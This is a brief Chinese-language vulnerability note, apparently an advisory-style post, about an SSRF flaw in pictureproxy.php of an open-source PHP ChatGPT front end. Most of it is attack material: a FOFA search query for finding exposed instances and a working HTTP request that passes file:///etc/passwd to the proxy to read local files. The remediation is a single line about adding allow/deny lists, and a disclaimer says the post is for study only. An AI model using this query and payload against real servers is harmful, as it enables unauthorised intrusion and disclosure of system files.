本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任
fofa
title="ChatGPT个人专用版"
该系统是一个开源的chatgpt系统,是PHP版调用OpenAI的API接口进行问答的模型,在prictureproxy.php文件处存在ssrf漏洞
payload
GET /pictureproxy.php?url=file:///etc/passwd HTTP/1.1 Host: x.x.x.x
修改源代码,进行黑白名单